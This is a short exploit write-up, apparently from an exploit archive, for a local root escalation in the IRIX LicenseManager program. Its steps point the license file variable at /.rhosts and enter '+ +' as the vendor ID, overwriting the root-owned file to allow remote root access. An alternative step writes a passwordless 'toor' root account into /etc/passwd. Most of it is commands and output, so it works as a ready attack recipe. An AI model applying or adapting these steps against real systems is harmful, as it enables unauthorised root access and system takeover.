29 lines
No EOL
837 B
Text
29 lines
No EOL
837 B
Text
source: http://www.securityfocus.com/bid/72/info
|
|
|
|
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
|
|
overwrite root-owned files allowing root access.
|
|
|
|
% setenv NETLS_LICENSE_FILE /.rhosts
|
|
% /usr/etc/LicenseManager &
|
|
|
|
Install...
|
|
NetLS Node-locked
|
|
Vendor Name: whatever
|
|
Vendor ID: + +
|
|
Product name: whatever
|
|
License version: 1.000
|
|
License version:
|
|
Expiration date: 01-jan-0
|
|
|
|
(in license version field put a space)
|
|
|
|
Apply
|
|
|
|
License(s) succesfully installed
|
|
|
|
% cat /.rhosts
|
|
#:# "whatever" "whatever" "1.000" "Incomplete"
|
|
+ +
|
|
|
|
If your system has remote root logins disabled, replacing /.rhosts with
|
|
/etc/passwd and + + with toor:0:0::/:/bin/sh. |